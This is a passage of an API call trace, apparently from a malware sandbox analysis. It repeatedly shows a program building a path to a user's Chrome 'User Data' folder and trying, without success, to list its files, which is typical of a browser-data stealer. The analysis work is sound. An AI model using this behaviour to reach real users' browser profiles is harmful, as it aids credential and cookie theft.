0xffffffff [0206.990] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.991] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.991] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.991] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.991] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.991] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.991] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.991] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.991] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.991] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.991] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.991] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.992] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.992] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.992] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.992] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.992] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.992] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.992] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.992] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.992] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.992] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.992] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.993] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.993] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.993] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.993] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.993] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.993] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.993] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.994] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.994] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.994] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.994] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.994] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.994] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.994] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.994] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.994] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.994] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.994] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.994] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.995] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.995] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.995] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.995] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.995] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.995] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.995] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.995] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.995] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.995] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.995] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.995] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.996] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.996] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.997] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.997] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.997] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.997] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 